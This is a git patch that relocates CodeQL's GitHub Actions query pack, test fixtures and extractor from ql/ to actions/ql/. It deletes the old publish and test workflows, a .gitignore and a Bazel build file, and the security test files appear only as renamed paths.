rename {ql => actions/ql}/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/formal.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/level0.yml (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/mend.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/poc.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test10.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test11.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test12.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test13.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test14.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test15.yml (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test16.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test17.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test18.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test19.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test20.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test21.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test22.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test23.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test24.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test25.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test26.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test27.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test28.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test29.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test4.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test5.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test6.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test7.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test8.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test9.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-918/.github/workflows/test.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-918/RequestForgery.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-918/RequestForgery.qlref (100%)
rename {ql => actions/ql}/test/query-tests/SyntaxError/.github/workflows/malformed.yml (100%)
rename {ql => actions/ql}/test/query-tests/SyntaxError/SyntaxError.expected (100%)
rename {ql => actions/ql}/test/query-tests/SyntaxError/SyntaxError.qlref (100%)
rename {ql => actions/ql}/test/query-tests/SyntaxError/options (100%)
rename {ql => actions/ql}/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml (100%)
rename {ql => actions/ql}/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml (100%)
rename {ql => actions/ql}/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected (100%)
rename {ql => actions/ql}/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref (100%)
delete mode
100644 codeql-workspace.yml diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml deleted file mode 100644 index 67a428233e2a..000000000000 --- a/.github/workflows/publish.yml +++ /dev/null @@ -1,33 +0,0 @@ -name: Publish -on: - workflow_dispatch: - -jobs: - publish: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v3 - - name: Fetch CodeQL - shell: bash - env: - GITHUB_TOKEN: ${{ github.token }} - run: | - gh extension install github/gh-codeql - gh codeql version - printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" - gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" - gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" - - name: Install Packs - env: - GITHUB_TOKEN: ${{ github.token }} - run: | - gh repo clone github/codeql - codeql pack install "ql/lib" - codeql pack install "ql/src" - codeql pack install "ql/test" - - name: Publish - env: - GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} - run: | - codeql pack publish ql/lib - codeql pack publish ql/src diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml deleted file mode 100644 index 9b07d1e74785..000000000000 --- a/.github/workflows/test.yml +++ /dev/null 
@@ -1,37 +0,0 @@
-name: Tests
-on:
- push:
- branches:
- - master
- pull_request:
- workflow_dispatch:
-
-jobs:
- tests:
- runs-on: ubuntu-latest
- steps:
- - uses: actions/checkout@v3
- - name: Fetch CodeQL
- shell: bash
- env:
- GITHUB_TOKEN: ${{ github.token }}
- run: |
- gh extension install github/gh-codeql
- gh codeql set-channel "nightly"
- gh codeql version
- printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}"
- gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}"
- gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}"
- - name: Install Packs
- env:
- GITHUB_TOKEN: ${{ github.token }}
- run: |
- gh repo clone github/codeql
- codeql pack ci "ql/lib"
- codeql pack ci "ql/src"
- codeql pack ci "ql/test"
- - name: Run Tests
- env:
- GITHUB_TOKEN: ${{ github.token }}
- run: |
- codeql test run --search-path "${{ github.workspace }}/extractor" ql/test
diff --git a/.gitignore b/.gitignore
deleted file mode 100644
index 173a5dd5d09f..000000000000
--- a/.gitignore
+++ /dev/null
@@ -1,7 +0,0 @@
-.DS_Store
-**/*.testproj
-ql/lib/.codeql/
-ql/src/.codeql/
-ql/test/.codeql/
-db/
-.cache
diff --git a/BUILD.bazel b/BUILD.bazel
deleted file mode 100644
index 643d40897185..000000000000
--- a/BUILD.bazel
+++ /dev/null
@@ -1,20 +0,0 @@
-load("//misc/bazel:pkg.bzl", "codeql_pack")
-
-package(default_visibility = ["//visibility:public"])
-
-[
- codeql_pack(
- name = "-".join(parts),
- srcs = [
- "//actions/extractor",
- ],
- pack_prefix = "/".join(parts),
- )
- for parts in (
- [
- "experimental",
- "actions",
- ],
- ["actions"],
- )
-]
diff --git a/extractor/BUILD.bazel b/actions/extractor/BUILD.bazel
similarity index 100%
rename from extractor/BUILD.bazel
rename to actions/extractor/BUILD.bazel
diff --git a/extractor/codeql-extractor.yml b/actions/extractor/codeql-extractor.yml
similarity index 100%
rename from extractor/codeql-extractor.yml
rename to actions/extractor/codeql-extractor.yml
diff --git a/extractor/tools/autobuild-impl.ps1 b/actions/extractor/tools/autobuild-impl.ps1
similarity index 100%
rename from extractor/tools/autobuild-impl.ps1
rename to actions/extractor/tools/autobuild-impl.ps1
diff --git a/extractor/tools/autobuild.cmd b/actions/extractor/tools/autobuild.cmd
similarity index 100%
rename from extractor/tools/autobuild.cmd
rename to actions/extractor/tools/autobuild.cmd
diff --git a/extractor/tools/autobuild.sh b/actions/extractor/tools/autobuild.sh
similarity index 100%
rename from extractor/tools/autobuild.sh
rename to actions/extractor/tools/autobuild.sh
diff --git a/ql/lib/actions.qll b/actions/ql/lib/actions.qll
similarity index 100%
rename from ql/lib/actions.qll
rename to actions/ql/lib/actions.qll
diff --git a/ql/lib/codeql-pack.lock.yml b/actions/ql/lib/codeql-pack.lock.yml
similarity index 100%
rename from ql/lib/codeql-pack.lock.yml
rename to actions/ql/lib/codeql-pack.lock.yml
diff --git a/ql/lib/codeql/Locations.qll b/actions/ql/lib/codeql/Locations.qll
similarity index 100%
rename from ql/lib/codeql/Locations.qll
rename to actions/ql/lib/codeql/Locations.qll
diff --git a/ql/lib/codeql/actions/Ast.qll b/actions/ql/lib/codeql/actions/Ast.qll
similarity index 100%
rename from ql/lib/codeql/actions/Ast.qll
rename to actions/ql/lib/codeql/actions/Ast.qll
diff --git a/ql/lib/codeql/actions/Bash.qll b/actions/ql/lib/codeql/actions/Bash.qll
similarity index 100%
rename from ql/lib/codeql/actions/Bash.qll
rename to actions/ql/lib/codeql/actions/Bash.qll
diff --git a/ql/lib/codeql/actions/Cfg.qll b/actions/ql/lib/codeql/actions/Cfg.qll
similarity index 100%
rename from ql/lib/codeql/actions/Cfg.qll
rename to actions/ql/lib/codeql/actions/Cfg.qll
diff --git a/ql/lib/codeql/actions/Consistency.ql b/actions/ql/lib/codeql/actions/Consistency.ql
similarity index 100%
rename from ql/lib/codeql/actions/Consistency.ql
rename to actions/ql/lib/codeql/actions/Consistency.ql
diff --git a/ql/lib/codeql/actions/DataFlow.qll b/actions/ql/lib/codeql/actions/DataFlow.qll
similarity index 100%
rename from ql/lib/codeql/actions/DataFlow.qll
rename to actions/ql/lib/codeql/actions/DataFlow.qll
diff --git a/ql/lib/codeql/actions/Helper.qll b/actions/ql/lib/codeql/actions/Helper.qll
similarity index 100%
rename from ql/lib/codeql/actions/Helper.qll
rename to actions/ql/lib/codeql/actions/Helper.qll
diff --git a/ql/lib/codeql/actions/PowerShell.qll b/actions/ql/lib/codeql/actions/PowerShell.qll
similarity index 100%
rename from ql/lib/codeql/actions/PowerShell.qll
rename to actions/ql/lib/codeql/actions/PowerShell.qll
diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/actions/ql/lib/codeql/actions/TaintTracking.qll
similarity index 100%
rename from ql/lib/codeql/actions/TaintTracking.qll
rename to actions/ql/lib/codeql/actions/TaintTracking.qll
diff --git a/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll b/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll
rename to actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/actions/ql/lib/codeql/actions/ast/internal/Ast.qll
similarity index 100%
rename from ql/lib/codeql/actions/ast/internal/Ast.qll
rename to actions/ql/lib/codeql/actions/ast/internal/Ast.qll
diff --git a/ql/lib/codeql/actions/ast/internal/Yaml.qll b/actions/ql/lib/codeql/actions/ast/internal/Yaml.qll
similarity index 100%
rename from ql/lib/codeql/actions/ast/internal/Yaml.qll
rename to actions/ql/lib/codeql/actions/ast/internal/Yaml.qll
diff --git a/ql/lib/codeql/actions/config/Config.qll b/actions/ql/lib/codeql/actions/config/Config.qll
similarity index 100%
rename from ql/lib/codeql/actions/config/Config.qll
rename to actions/ql/lib/codeql/actions/config/Config.qll
diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll
similarity index 100%
rename from ql/lib/codeql/actions/config/ConfigExtensions.qll
rename to actions/ql/lib/codeql/actions/config/ConfigExtensions.qll
diff --git a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll b/actions/ql/lib/codeql/actions/controlflow/BasicBlocks.qll
similarity index 100%
rename from ql/lib/codeql/actions/controlflow/BasicBlocks.qll
rename to actions/ql/lib/codeql/actions/controlflow/BasicBlocks.qll
diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
similarity index 100%
rename from ql/lib/codeql/actions/controlflow/internal/Cfg.qll
rename to actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/actions/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
similarity index 100%
rename from ql/lib/codeql/actions/dataflow/ExternalFlow.qll
rename to actions/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/actions/ql/lib/codeql/actions/dataflow/FlowSources.qll
similarity index 100%
rename from ql/lib/codeql/actions/dataflow/FlowSources.qll
rename to actions/ql/lib/codeql/actions/dataflow/FlowSources.qll
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/actions/ql/lib/codeql/actions/dataflow/FlowSteps.qll
similarity index 100%
rename from ql/lib/codeql/actions/dataflow/FlowSteps.qll
rename to actions/ql/lib/codeql/actions/dataflow/FlowSteps.qll
diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/actions/ql/lib/codeql/actions/dataflow/TaintSteps.qll
similarity index 100%
rename from ql/lib/codeql/actions/dataflow/TaintSteps.qll
rename to actions/ql/lib/codeql/actions/dataflow/TaintSteps.qll
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll
similarity index 100%
rename from ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll
rename to actions/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
similarity index 100%
rename from ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
rename to actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll
similarity index 100%
rename from ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll
rename to actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll
diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/actions/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
similarity index 100%
rename from ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
rename to actions/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll
similarity index 100%
rename from ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll
rename to actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll
diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll
similarity index 100%
rename from ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll
rename to actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll
diff --git a/ql/lib/codeql/actions/ideContextual/IDEContextual.qll b/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll
similarity index 100%
rename from ql/lib/codeql/actions/ideContextual/IDEContextual.qll
rename to actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll
diff --git a/ql/lib/codeql/actions/ideContextual/printAst.qll b/actions/ql/lib/codeql/actions/ideContextual/printAst.qll
similarity index 100%
rename from ql/lib/codeql/actions/ideContextual/printAst.qll
rename to actions/ql/lib/codeql/actions/ideContextual/printAst.qll
diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll
rename to actions/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll
diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/actions/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
rename to actions/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/actions/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/CachePoisoningQuery.qll
rename to actions/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/CodeInjectionQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/CodeInjectionQuery.qll
rename to actions/ql/lib/codeql/actions/security/CodeInjectionQuery.qll
diff --git a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/CommandInjectionQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/CommandInjectionQuery.qll
rename to actions/ql/lib/codeql/actions/security/CommandInjectionQuery.qll
diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/actions/ql/lib/codeql/actions/security/ControlChecks.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/ControlChecks.qll
rename to actions/ql/lib/codeql/actions/security/ControlChecks.qll
diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll
rename to actions/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll
diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll
rename to actions/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll
diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/actions/ql/lib/codeql/actions/security/OutputClobberingQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/OutputClobberingQuery.qll
rename to actions/ql/lib/codeql/actions/security/OutputClobberingQuery.qll
diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/actions/ql/lib/codeql/actions/security/PoisonableSteps.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/PoisonableSteps.qll
rename to actions/ql/lib/codeql/actions/security/PoisonableSteps.qll
diff --git a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll b/actions/ql/lib/codeql/actions/security/RequestForgeryQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/RequestForgeryQuery.qll
rename to actions/ql/lib/codeql/actions/security/RequestForgeryQuery.qll
diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/actions/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll
rename to actions/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll
diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/actions/ql/lib/codeql/actions/security/SelfHostedQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/SelfHostedQuery.qll
rename to actions/ql/lib/codeql/actions/security/SelfHostedQuery.qll
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/actions/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
rename to actions/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
diff --git a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll b/actions/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll
rename to actions/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll
diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll
similarity index 100%
rename from ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll
rename to actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll
diff --git a/ql/lib/codeql/files/FileSystem.qll b/actions/ql/lib/codeql/files/FileSystem.qll
similarity index 100%
rename from ql/lib/codeql/files/FileSystem.qll
rename to actions/ql/lib/codeql/files/FileSystem.qll
diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/actions/ql/lib/ext/config/argument_injection_sinks.yml
similarity index 100%
rename from ql/lib/ext/config/argument_injection_sinks.yml
rename to actions/ql/lib/ext/config/argument_injection_sinks.yml
diff --git a/ql/lib/ext/config/context_event_map.yml b/actions/ql/lib/ext/config/context_event_map.yml
similarity index 100%
rename from ql/lib/ext/config/context_event_map.yml
rename to actions/ql/lib/ext/config/context_event_map.yml
diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/actions/ql/lib/ext/config/externally_triggereable_events.yml
similarity index 100%
rename from ql/lib/ext/config/externally_triggereable_events.yml
rename to actions/ql/lib/ext/config/externally_triggereable_events.yml
diff --git a/ql/lib/ext/config/immutable_actions.yml b/actions/ql/lib/ext/config/immutable_actions.yml
similarity index 100%
